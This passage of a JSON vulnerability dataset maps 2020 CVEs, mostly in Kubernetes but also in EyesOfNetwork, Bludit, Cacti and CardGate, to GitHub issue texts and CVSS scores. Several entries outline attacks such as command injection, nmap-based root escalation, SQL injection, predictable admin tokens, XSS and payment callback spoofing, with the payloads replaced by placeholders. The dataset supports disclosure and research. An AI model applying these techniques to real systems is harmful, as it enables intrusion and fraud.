  62288. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/97076",
  62289. "Repo_new": "kubernetes/kubernetes",
  62290. "Issue_Created_At": "2020-12-04T20:02:15Z",
  62291. "description": "RESERVED. Reserved for CVE.",
  62292. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L",
  62293. "severity": "MEDIUM",
  62294. "baseScore": 5.0,
  62295. "impactScore": 3.4,
  62296. "exploitabilityScore": 1.6
  62297. },
  62298. {
  62299. "CVE_ID": "CVE-2020-8554",
  62300. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/97110",
  62301. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/97110",
  62302. "Repo_new": "kubernetes/kubernetes",
  62303. "Issue_Created_At": "2020-12-07T17:47:04Z",
  62304. "description": "Figure out what to do about external IPs. For CVETAG , URLTAG we decided we couldn't patch it in tree, and instead provided workarounds to disable (or allowlist) the feature through admission controls. Now that the issue is public, I'd like to open the conversation about a long term fix. Unless we missed something (entirely possible), I see a few possible paths forward NUMBERTAG Decide to stop supporting external IPs, deprecate and eventually remove the feature NUMBERTAG Attempt to redesign the external IP feature, deprecate the old behavior, and manage the migration to the new feature NUMBERTAG Accept the current state, and promote the externalip webhook URLTAG to a built in admission controller NUMBERTAG Accept the current state, and support the externalip webhook URLTAG as a long term solution /sig network architecture /area security /priority important soon",
  62305. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L",
  62306. "severity": "MEDIUM",
  62307. "baseScore": 5.0,
  62308. "impactScore": 3.4,
  62309. "exploitabilityScore": 1.6
  62310. },
  62311. {
  62312. "CVE_ID": "CVE-2020-8555",
  62313. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/91542",
  62314. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/91542",
  62315. "Repo_new": "kubernetes/kubernetes",
  62316. "Issue_Created_At": "2020-05-28T16:13:34Z",
  62317. "description": "Placeholder issue. Placeholder issue, please do not delete.",
  62318. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N",
  62319. "severity": "MEDIUM",
  62320. "baseScore": 6.3,
  62321. "impactScore": 4.0,
  62322. "exploitabilityScore": 1.8
  62323. },
  62324. {
  62325. "CVE_ID": "CVE-2020-8557",
  62326. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/93032",
  62327. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/93032",
  62328. "Repo_new": "kubernetes/kubernetes",
  62329. "Issue_Created_At": "2020-07-13T18:39:08Z",
  62330. "description": "Placeholder issue. Placeholder issue, please do not delete.",
  62331. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  62332. "severity": "MEDIUM",
  62333. "baseScore": 5.5,
  62334. "impactScore": 3.6,
  62335. "exploitabilityScore": 1.8
  62336. },
  62337. {
  62338. "CVE_ID": "CVE-2020-8558",
  62339. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/92315",
  62340. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/92315",
  62341. "Repo_new": "kubernetes/kubernetes",
  62342. "Issue_Created_At": "2020-06-19T18:38:58Z",
  62343. "description": "Placeholder issue. Placeholder issue, please do not delete.",
  62344. "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  62345. "severity": "HIGH",
  62346. "baseScore": 8.8,
  62347. "impactScore": 5.9,
  62348. "exploitabilityScore": 2.8
  62349. },
  62350. {
  62351. "CVE_ID": "CVE-2020-8559",
  62352. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/92914",
  62353. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/92914",
  62354. "Repo_new": "kubernetes/kubernetes",
  62355. "Issue_Created_At": "2020-07-08T17:03:16Z",
  62356. "description": "[RESERVED]. This issue is reserved for a future vulnerability announcement. /close",
  62357. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H",
  62358. "severity": "MEDIUM",
  62359. "baseScore": 6.8,
  62360. "impactScore": 5.9,
  62361. "exploitabilityScore": 0.9
  62362. },
  62363. {
  62364. "CVE_ID": "CVE-2020-8561",
  62365. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/104720",
  62366. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/104720",
  62367. "Repo_new": "kubernetes/kubernetes",
  62368. "Issue_Created_At": "2021-09-01T20:18:50Z",
  62369. "description": "TITLE: PLACEHOLDER ISSUE. /triage accepted /lifecycle frozen /area security /kind bug /committee security response",
  62370. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N",
  62371. "severity": "MEDIUM",
  62372. "baseScore": 4.1,
  62373. "impactScore": 1.4,
  62374. "exploitabilityScore": 2.3
  62375. },
  62376. {
  62377. "CVE_ID": "CVE-2020-8562",
  62378. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/101493",
  62379. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/101493",
  62380. "Repo_new": "kubernetes/kubernetes",
  62381. "Issue_Created_At": "2021-04-26T19:18:04Z",
  62382. "description": "PLACEHOLDER ISSUE. /area security /kind bug /committee product security /lifecycle frozen",
  62383. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N",
  62384. "severity": "LOW",
  62385. "baseScore": 3.1,
  62386. "impactScore": 1.4,
  62387. "exploitabilityScore": 1.6
  62388. },
  62389. {
  62390. "CVE_ID": "CVE-2020-8563",
  62391. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/95621",
  62392. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/95621",
  62393. "Repo_new": "kubernetes/kubernetes",
  62394. "Issue_Created_At": "2020-10-15T22:00:44Z",
  62395. "description": "CVETAG : Secret leaks in kube controller manager when using APITAG provider. CVSS Rating NUMBERTAG PATHTAG APITAG In Kubernetes clusters using APITAG as a cloud provider, with a logging level set to NUMBERTAG or above, APITAG cloud credentials will be leaked in the cloud controller manager's log. Am I vulnerable? If you are using APITAG as a cloud provider, have verbose logging enabled, and an attacker can access cluster logs, then you may be vulnerable to this. Affected Versions kube controller manager NUMBERTAG How do I mitigate this vulnerability? Do not enable verbose logging in production, limit access to cluster logs. Fixed Versions NUMBERTAG To upgrade, refer to the documentation: URLTAG Acknowledgements This vulnerability was reported by: Kaizhe Huang (derek NUMBERTAG area security /kind bug /committee product security",
  62396. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  62397. "severity": "MEDIUM",
  62398. "baseScore": 5.5,
  62399. "impactScore": 3.6,
  62400. "exploitabilityScore": 1.8
  62401. },
  62402. {
  62403. "CVE_ID": "CVE-2020-8564",
  62404. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/95622",
  62405. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/95622",
  62406. "Repo_new": "kubernetes/kubernetes",
  62407. "Issue_Created_At": "2020-10-15T22:03:19Z",
  62408. "description": "CVETAG : Docker config secrets leaked when file is malformed and log level NUMBERTAG CVSS Rating NUMBERTAG PATHTAG APITAG In Kubernetes clusters using a logging level of at least NUMBERTAG processing a malformed docker config file will result in the contents of the docker config file being leaked, which can include pull secrets or other registry credentials. Am I vulnerable? If APITAG type secrets are used, and a log level of NUMBERTAG or higher is used. Third party tools using PATHTAG to read docker config files may also be vulnerable. Affected Versions kubernetes NUMBERTAG kubernetes NUMBERTAG kubernetes NUMBERTAG How do I mitigate this vulnerability? Do not enable verbose logging in production, limit access to logs. Fixed Versions NUMBERTAG To upgrade, refer to the documentation: URLTAG Acknowledgements This vulnerability was reported by: Nikolaos Moraitis APITAG Hat) /area security /kind bug /committee product security",
  62409. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  62410. "severity": "MEDIUM",
  62411. "baseScore": 5.5,
  62412. "impactScore": 3.6,
  62413. "exploitabilityScore": 1.8
  62414. },
  62415. {
  62416. "CVE_ID": "CVE-2020-8565",
  62417. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/95623",
  62418. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/95623",
  62419. "Repo_new": "kubernetes/kubernetes",
  62420. "Issue_Created_At": "2020-10-15T22:05:32Z",
  62421. "description": "CVETAG : Incomplete fix for CVETAG allows for token leak in logs when APITAG NUMBERTAG CVSS Rating NUMBERTAG PATHTAG APITAG In Kubernetes, if the logging level is to at least NUMBERTAG authorization and bearer tokens will be written to log files. This can occur both in API server logs and client tool output like kubectl . Am I vulnerable? If kube apiserver is using a log level of at least NUMBERTAG Affected Versions kubernetes NUMBERTAG kubernetes NUMBERTAG kubernetes NUMBERTAG How do I mitigate this vulnerability? Do not enable verbose logging in production, limit access to logs. Fixed Versions NUMBERTAG alpha2 To upgrade, refer to the documentation: URLTAG Acknowledgements This vulnerability was reported by: Patrick Rhomberg (purelyapplied) /area security /kind bug /committee product security",
  62422. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  62423. "severity": "MEDIUM",
  62424. "baseScore": 5.5,
  62425. "impactScore": 3.6,
  62426. "exploitabilityScore": 1.8
  62427. },
  62428. {
  62429. "CVE_ID": "CVE-2020-8566",
  62430. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/95624",
  62431. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/95624",
  62432. "Repo_new": "kubernetes/kubernetes",
  62433. "Issue_Created_At": "2020-10-15T22:07:53Z",
  62434. "description": "CVETAG : Ceph RBD APITAG exposed in logs when loglevel NUMBERTAG CVSS Rating NUMBERTAG PATHTAG APITAG In Kubernetes clusters using Ceph RBD as a storage provisioner, with logging level of at least NUMBERTAG Ceph RBD admin secrets can be written to logs. This occurs in kube controller manager's logs during provisioning of Ceph RBD persistent claims. Am I vulnerable? If Ceph RBD volumes are in use and kube controller manager is using a log level of at least NUMBERTAG Affected Versions kubernetes NUMBERTAG kubernetes NUMBERTAG kubernetes NUMBERTAG How do I mitigate this vulnerability? Do not enable verbose logging in production, limit access to logs. Fixed Versions NUMBERTAG To upgrade, refer to the documentation: URLTAG Acknowledgements This vulnerability was reported by: Kaizhe Huang (derek NUMBERTAG area security /kind bug /committee product security",
  62435. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  62436. "severity": "MEDIUM",
  62437. "baseScore": 5.5,
  62438. "impactScore": 3.6,
  62439. "exploitabilityScore": 1.8
  62440. },
  62441. {
  62442. "CVE_ID": "CVE-2020-8567",
  62443. "Issue_Url_old": "https://github.com/kubernetes-sigs/secrets-store-csi-driver/issues/384",
  62444. "Issue_Url_new": "https://github.com/kubernetes-sigs/secrets-store-csi-driver/issues/384",
  62445. "Repo_new": "kubernetes-sigs/secrets-store-csi-driver",
  62446. "Issue_Created_At": "2020-11-16T17:36:27Z",
  62447. "description": "CVETAG : Plugin directory traversals. CVSS Rating: Medium NUMBERTAG PATHTAG URLTAG Specially crafted APITAG can write to arbitrary file paths on the host filesystem, including APITAG . Am I vulnerable? All supported plugins included this bug. Affected Versions Vault Plugin NUMBERTAG Azure Plugin NUMBERTAG GCP Plugin NUMBERTAG How do I mitigate this vulnerability? Update all plugins to versions that include fixes. Fixed Versions Vault Plugin NUMBERTAG fixed by NUMBERTAG URLTAG Azure Plugin NUMBERTAG fixed by NUMBERTAG URLTAG GCP Plugin NUMBERTAG fixed by NUMBERTAG URLTAG Detection APITAG with APITAG , APITAG or APITAG that includes APITAG",
  62448. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  62449. "severity": "MEDIUM",
  62450. "baseScore": 6.5,
  62451. "impactScore": 3.6,
  62452. "exploitabilityScore": 2.8
  62453. },
  62454. {
  62455. "CVE_ID": "CVE-2020-8568",
  62456. "Issue_Url_old": "https://github.com/kubernetes-sigs/secrets-store-csi-driver/issues/378",
  62457. "Issue_Url_new": "https://github.com/kubernetes-sigs/secrets-store-csi-driver/issues/378",
  62458. "Repo_new": "kubernetes-sigs/secrets-store-csi-driver",
  62459. "Issue_Created_At": "2020-11-10T23:10:13Z",
  62460. "description": "CVETAG : Secrets sync/rotate directory traversal. CVSS Rating: Medium NUMBERTAG PATHTAG URLTAG Modification of APITAG resource could result in writing content to the host filesystem and syncing file contents to Kubernetes Secrets. This includes paths under APITAG that contain other Kubernetes Secrets. Am I vulnerable? The attacker must have permissions to update or patch the APITAG resources which is not granted by default and the auto rotations feature must be enabled which is also not enabled by default. Affected Versions NUMBERTAG How do I mitigate this vulnerability? Do not grant users or workloads permissions to modify APITAG resources. Upgrade the driver to NUMBERTAG or above which include additional verifications on the APITAG field. Fixed Versions NUMBERTAG fixed by NUMBERTAG URLTAG Detection N/A",
  62461. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N",
  62462. "severity": "MEDIUM",
  62463. "baseScore": 6.5,
  62464. "impactScore": 5.2,
  62465. "exploitabilityScore": 1.2
  62466. },
  62467. {
  62468. "CVE_ID": "CVE-2020-8569",
  62469. "Issue_Url_old": "https://github.com/kubernetes-csi/external-snapshotter/issues/380",
  62470. "Issue_Url_new": "https://github.com/kubernetes-csi/external-snapshotter/issues/380",
  62471. "Repo_new": "kubernetes-csi/external-snapshotter",
  62472. "Issue_Created_At": "2020-09-29T13:00:51Z",
  62473. "description": "snapshot controller panics when source PVC does not exist. When taking a snapshot of a non existing PVC, snapshot controller panics: ERRORTAG To reproduce this, the APITAG must not have a APITAG CODETAG",
  62474. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  62475. "severity": "MEDIUM",
  62476. "baseScore": 6.5,
  62477. "impactScore": 3.6,
  62478. "exploitabilityScore": 2.8
  62479. },
  62480. {
  62481. "CVE_ID": "CVE-2020-8570",
  62482. "Issue_Url_old": "https://github.com/kubernetes-client/java/issues/1491",
  62483. "Issue_Url_new": "https://github.com/kubernetes-client/java/issues/1491",
  62484. "Repo_new": "kubernetes-client/java",
  62485. "Issue_Created_At": "2021-01-11T23:09:47Z",
  62486. "description": "CVETAG : Path Traversal bug in the Java Kubernetes Client. There is a defect in the copy implementation in APITAG that was fixed in NUMBERTAG The summary of the issue is that you copy a file from a malicious pod with a specially crafted tarball, it may extract to any file that your user has permission to write. This issue was fixed in release APITAG , APITAG and APITAG users are strongly encouraged to upgrade to those versions.",
  62487. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  62488. "severity": "CRITICAL",
  62489. "baseScore": 9.1,
  62490. "impactScore": 5.2,
  62491. "exploitabilityScore": 3.9
  62492. },
  62493. {
  62494. "CVE_ID": "CVE-2020-8645",
  62495. "Issue_Url_old": "https://github.com/niteosoft/simplejobscript/issues/9",
  62496. "Issue_Url_new": "https://github.com/niteosoft/simplejobscript/issues/9",
  62497. "Repo_new": "niteosoft/simplejobscript",
  62498. "Issue_Created_At": "2020-01-19T13:01:39Z",
  62499. "description": "FILETAG",
  62500. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  62501. "severity": "CRITICAL",
  62502. "baseScore": 9.8,
  62503. "impactScore": 5.9,
  62504. "exploitabilityScore": 3.9
  62505. },
  62506. {
  62507. "CVE_ID": "CVE-2020-8654",
  62508. "Issue_Url_old": "https://github.com/EyesOfNetworkCommunity/eonweb/issues/50",
  62509. "Issue_Url_new": "https://github.com/eyesofnetworkcommunity/eonweb/issues/50",
  62510. "Repo_new": "eyesofnetworkcommunity/eonweb",
  62511. "Issue_Created_At": "2020-02-05T13:27:51Z",
  62512. "description": "Execution de commandes arbitraires sur le module APITAG Bonjour, Il est possible d\u2019ex\u00e9cuter des commandes arbitraires sur le syst\u00e8me d'exploitation pour un utilisateur d'EON ayant les droits suffisant pour utiliser le module APITAG Le champ APITAG n'est pas filtr\u00e9 est il est possible d\u2019ex\u00e9cuter des commandes arbitraires. Voici un exemple de valeur de Target \u00e9x\u00e9cutant la command id sur le syst\u00e8me: APITAG R\u00e9sultat obtenu: FILETAG Ceci a \u00e9t\u00e9 test\u00e9 sur une installation de EON NUMBERTAG classique t\u00e9l\u00e9charg\u00e9e \u00e0 partir du site officiel.",
  62513. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  62514. "severity": "HIGH",
  62515. "baseScore": 8.8,
  62516. "impactScore": 5.9,
  62517. "exploitabilityScore": 2.8
  62518. },
  62519. {
  62520. "CVE_ID": "CVE-2020-8655",
  62521. "Issue_Url_old": "https://github.com/EyesOfNetworkCommunity/eonconf/issues/8",
  62522. "Issue_Url_new": "https://github.com/eyesofnetworkcommunity/eonconf/issues/8",
  62523. "Repo_new": "eyesofnetworkcommunity/eonconf",
  62524. "Issue_Created_At": "2020-02-05T13:40:03Z",
  62525. "description": "Elevation de privil\u00e8ges possible depuis l'utilisateur apache.. Bonjour, Il est possible pour l'utilisateur apache d\u2019ex\u00e9cuter des commandes arbitraires en tant que l'utilisateur root. Voici la configuration par d\u00e9faut pr\u00e9sente pour l'utilisateur apache sur EON NUMBERTAG CODETAG Un utilisateur peut utiliser la commande nmap pour ex\u00e9cuter des commandes arbitraires en tant que 'root' en utilisant un script NSE sp\u00e9cialement con\u00e7u. Preuve de concept: FILETAG Ceci a \u00e9t\u00e9 test\u00e9 sur une installation de EON NUMBERTAG classique t\u00e9l\u00e9charg\u00e9e \u00e0 partir du site officiel.",
  62526. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  62527. "severity": "HIGH",
  62528. "baseScore": 7.8,
  62529. "impactScore": 5.9,
  62530. "exploitabilityScore": 1.8
  62531. },
  62532. {
  62533. "CVE_ID": "CVE-2020-8656",
  62534. "Issue_Url_old": "https://github.com/EyesOfNetworkCommunity/eonapi/issues/16",
  62535. "Issue_Url_new": "https://github.com/eyesofnetworkcommunity/eonapi/issues/16",
  62536. "Repo_new": "eyesofnetworkcommunity/eonapi",
  62537. "Issue_Created_At": "2020-02-05T13:20:52Z",
  62538. "description": "Injection SQL sur le champ username de APITAG Bonjour, Il est possible de r\u00e9aliser une injection SQL sur le champ username de la fonction APITAG Exemple d'injection de code utilisant la fonction sleep NUMBERTAG ERRORTAG Ceci a \u00e9t\u00e9 test\u00e9 sur une installation de EON NUMBERTAG classique t\u00e9l\u00e9charg\u00e9e \u00e0 partir du site officiel. La version report\u00e9e de l'API est la NUMBERTAG avec l'installation de EON.",
  62539. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  62540. "severity": "CRITICAL",
  62541. "baseScore": 9.8,
  62542. "impactScore": 5.9,
  62543. "exploitabilityScore": 3.9
  62544. },
  62545. {
  62546. "CVE_ID": "CVE-2020-8657",
  62547. "Issue_Url_old": "https://github.com/EyesOfNetworkCommunity/eonapi/issues/17",
  62548. "Issue_Url_new": "https://github.com/eyesofnetworkcommunity/eonapi/issues/17",
  62549. "Repo_new": "eyesofnetworkcommunity/eonapi",
  62550. "Issue_Created_At": "2020-02-05T14:03:19Z",
  62551. "description": "Cl\u00e9s d'API pr\u00e9dictible/bruteforcable. Bonjour, Il a \u00e9t\u00e9 observ\u00e9 que la cl\u00e9s d'API par d\u00e9faut d'une installation de EON NUMBERTAG reste inchang\u00e9 apr\u00e8s une installation ( APITAG ) et cet \u00e9l\u00e9ment de configuration ne semble pas accessible dans l'interface d\u2019administration WEB. Le calcul du token d'API d'un utilisateur est bas\u00e9e sur la cl\u00e9s, son ID ainsi que de l'IP du serveur. L'ID du compte admin est NUMBERTAG et l'adresse IP du serveur est connu (sauf si NAT en place). CODETAG Il devient alors trivial de calculer le token du compte admin. Ceci a \u00e9t\u00e9 test\u00e9 sur une installation de EON NUMBERTAG t\u00e9l\u00e9charg\u00e9e \u00e0 partir du site officiel. La version report\u00e9e de l'API est la NUMBERTAG avec l'installation de EON.",
  62552. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  62553. "severity": "CRITICAL",
  62554. "baseScore": 9.8,
  62555. "impactScore": 5.9,
  62556. "exploitabilityScore": 3.9
  62557. },
  62558. {
  62559. "CVE_ID": "CVE-2020-8788",
  62560. "Issue_Url_old": "https://github.com/ClearCanvas/ClearCanvas/issues/227",
  62561. "Issue_Url_new": "https://github.com/clearcanvas/clearcanvas/issues/227",
  62562. "Repo_new": "clearcanvas/clearcanvas",
  62563. "Issue_Created_At": "2019-07-24T21:37:53Z",
  62564. "description": "Cross site Scripting (XSS) and HTML Injection on APITAG APITAG NUMBERTAG Alpha. Hello, I found two vulnerabilities that affect to APITAG APITAG NUMBERTAG Alpha: Cross site Scripting (XSS) reflected HTML Injection You can reproduce both with the following details NUMBERTAG Payload: APITAG xss NUMBERTAG ulnerable POST data: APITAG APITAG xss NUMBERTAG Output: APITAG A potentially dangerous APITAG value was detected from the client APITAG APITAG ...\"). APITAG NUMBERTAG Step NUMBERTAG Open PATHTAG or PATHTAG URL login page according your config deployments NUMBERTAG Step NUMBERTAG Fill the username and password inputs with XSS/HTML payload and submit the login form NUMBERTAG Step NUMBERTAG Then, you will have a XSS/HTML injections clicking on payload. FILETAG FILETAG If you need reproduce, fix the issue, or more details about that, please, feel free to ping me URLTAG .",
  62565. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  62566. "severity": "MEDIUM",
  62567. "baseScore": 6.1,
  62568. "impactScore": 2.7,
  62569. "exploitabilityScore": 2.8
  62570. },
  62571. {
  62572. "CVE_ID": "CVE-2020-8811",
  62573. "Issue_Url_old": "https://github.com/bludit/bludit/issues/1131",
  62574. "Issue_Url_new": "https://github.com/bludit/bludit/issues/1131",
  62575. "Repo_new": "bludit/bludit",
  62576. "Issue_Created_At": "2020-02-05T04:06:25Z",
  62577. "description": "Security Arbitrary Change Profile Picture. Describe This vulnerability allows authenticated users to change other user's profile pictures. Steps to reproduce the vulnerability NUMBERTAG Tried to login via Administrator privilege. We found NUMBERTAG accounts. \ufeff FILETAG Moreover, we can access directly to Profile Pictures like this _ URLTAG FILETAG FILETAG FILETAG NUMBERTAG Tried to login via limit privilege (username: admon2, role: Editor). FILETAG From a HTTP Request to perform to change a user picture. FILETAG We could change the username to another username. FILETAG As a result, we could change to the profile picture of another user. FILETAG FILETAG Login with Administrator to verify the change via username \u201cadmin\u201d and found a profile picture has changed. FILETAG In addition, we could arbitrarily create a picture (png) to other directories. FILETAG FILETAG Comments The vulnerability doesn't validate an authorization before the upload process. Moreover, it could be pulled username from trusted source Bludit version Affected in Bludit NUMBERTAG PHP version PHP Version NUMBERTAG",
  62578. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
  62579. "severity": "MEDIUM",
  62580. "baseScore": 4.3,
  62581. "impactScore": 1.4,
  62582. "exploitabilityScore": 2.8
  62583. },
  62584. {
  62585. "CVE_ID": "CVE-2020-8812",
  62586. "Issue_Url_old": "https://github.com/bludit/bludit/issues/1132",
  62587. "Issue_Url_new": "https://github.com/bludit/bludit/issues/1132",
  62588. "Repo_new": "bludit/bludit",
  62589. "Issue_Created_At": "2020-02-05T04:14:38Z",
  62590. "description": "Security Stored Cross Site Script. Describe This vulnerability allows Editor or Author roles could insert malicious APITAG on the WYSIWYG editor. Steps to reproduce the vulnerability Affected in Bludit NUMBERTAG Tried to login with username \u201cadmon2\u201d, who is an Editor. Then, pressed the button. FILETAG FILETAG We inserted a simple APITAG for APITAG FILETAG As a result, we could insert malicious APITAG on the WYSIWYG editor. FILETAG But the CMS had inserted APITAG when web applications issued a token to web browser, resulting in the attacker couldn\u2019t steal the cookie. FILETAG But the attacker still crafted malicious APITAG to do anything. I.e. enforce every legitimate user to logout on the web application FILETAG As a result, we could enforce legitimated users to logout. FILETAG Bludit version Affected in Bludit NUMBERTAG PHP version PHP Version NUMBERTAG",
  62591. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  62592. "severity": "MEDIUM",
  62593. "baseScore": 5.4,
  62594. "impactScore": 2.7,
  62595. "exploitabilityScore": 2.3
  62596. },
  62597. {
  62598. "CVE_ID": "CVE-2020-8813",
  62599. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3285",
  62600. "Issue_Url_new": "https://github.com/cacti/cacti/issues/3285",
  62601. "Repo_new": "cacti/cacti",
  62602. "Issue_Created_At": "2020-02-23T06:03:06Z",
  62603. "description": "When guest users have access to realtime graphs, remote code could be executed ( CVETAG ). Describe the bug Mohammad Askar of APITAG has reported that FILETAG prior to NUMBERTAG allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie if a guest user has the graph real time privilege. To Reproduce Steps to reproduce the behavior NUMBERTAG Enable the guest account NUMBERTAG Ensure the guest account has full access to realtime graphs NUMBERTAG Change the APITAG cookie to have malformed characters which could run a script. Expected behavior The raw output of the cookie should be treated as insecure and as such, a validated version of the value utilised. Additional context This was reported as CVETAG",
  62604. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  62605. "severity": "HIGH",
  62606. "baseScore": 8.8,
  62607. "impactScore": 5.9,
  62608. "exploitabilityScore": 2.8
  62609. },
  62610. {
  62611. "CVE_ID": "CVE-2020-8818",
  62612. "Issue_Url_old": "https://github.com/cardgate/magento2/issues/54",
  62613. "Issue_Url_new": "https://github.com/cardgate/magento2/issues/54",
  62614. "Repo_new": "cardgate/magento2",
  62615. "Issue_Created_At": "2020-02-24T18:42:21Z",
  62616. "description": "Public disclosure on CVETAG Unauthorized Payments Hijacking + Order Status Spoofing]. [ CVETAG CVETAG Lack of origin authentication ( CVETAG CVETAG at IPN callback processing function allow ( even _unauthorized_ ) attacker to remotely replace critical plugin settings (merchant id, secret key etc) with known to him and therefore bypass payment process (eg. spoof order status by manually sending IPN callback request with a valid signature but without real payment) and/or receive all subsequent payments (on behalf of the store). Vulnerable code (fixed in PR NUMBERTAG URLTAG Affected versions NUMBERTAG Tested on: Magento NUMBERTAG FILETAG APITAG of Concept APITAG APITAG ERRORTAG APITAG APITAG",
  62617. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  62618. "severity": "HIGH",
  62619. "baseScore": 8.1,
  62620. "impactScore": 5.2,
  62621. "exploitabilityScore": 2.8
  62622. },
  62623. {
  62624. "CVE_ID": "CVE-2020-8819",
  62625. "Issue_Url_old": "https://github.com/cardgate/woocommerce/issues/18",
  62626. "Issue_Url_new": "https://github.com/cardgate/woocommerce/issues/18",
  62627. "Repo_new": "cardgate/woocommerce",
  62628. "Issue_Created_At": "2020-02-24T18:40:59Z",
  62629. "description": "Public disclosure on CVETAG Unauthorized Payments Hijacking + Order Status Spoofing]. [ CVETAG CVETAG Lack of origin authentication ( CVETAG CVETAG at IPN callback processing function allow ( even _unauthorized_ ) attacker to remotely replace critical plugin settings (merchant id, secret key etc) with known to him and therefore bypass payment process (eg. spoof order status by manually sending IPN callback request with a valid signature but without real payment) and/or receive all subsequent payments (on behalf of the store). Vulnerable code (fixed in PR NUMBERTAG URLTAG Affected versions NUMBERTAG Tested on: APITAG NUMBERTAG APITAG NUMBERTAG FILETAG APITAG of Concept APITAG APITAG ERRORTAG APITAG APITAG",
  62630. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  62631. "severity": "HIGH",
  62632. "baseScore": 8.1,
  62633. "impactScore": 5.2,
  62634. "exploitabilityScore": 2.8
  62635. },
  62636. {
  62637. "CVE_ID": "CVE-2020-8823",
  62638. "Issue_Url_old": "https://github.com/theyiyibest/Reflected-XSS-on-SockJS/issues/1",
  62639. "Issue_Url_new": "https://github.com/theyiyibest/reflected-xss-on-sockjs/issues/1",
  62640. "Repo_new": "theyiyibest/reflected-xss-on-sockjs",
  62641. "Issue_Created_At": "2020-02-14T14:57:10Z",
  62642. "description": "Affected version and product name accurate?. I'm concerned the public text of CVETAG isn't well defined enough for development teams to patch the affected library. Can you provide more details to help? Specifically the concern is that product name and version number do not match clearly with APITAG APITAG seems to be a product family and not a single product. The entire product family does not look to be affected, and the issue seems to reside in sockjs node. Is this correct? The version number is also confusing, as sockjs node is currently listed as being NUMBERTAG Was the library released on another platform as version NUMBERTAG It would be appreciated if you can help update the CVE text to be more clear about what is affected. I assume this has been reported to the authors of APITAG They may be able to help pinpoint exactly what needs to be updated in the wording",
  62643. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  62644. "severity": "MEDIUM",
  62645. "baseScore": 6.1,
  62646. "impactScore": 2.7,
  62647. "exploitabilityScore": 2.8
  62648. },
  62649. {
  62650. "CVE_ID": "CVE-2020-8840",
  62651. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2620",
  62652. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2620",
  62653. "Repo_new": "fasterxml/jackson-databind",
  62654. "Issue_Created_At": "2020-02-09T22:50:59Z",
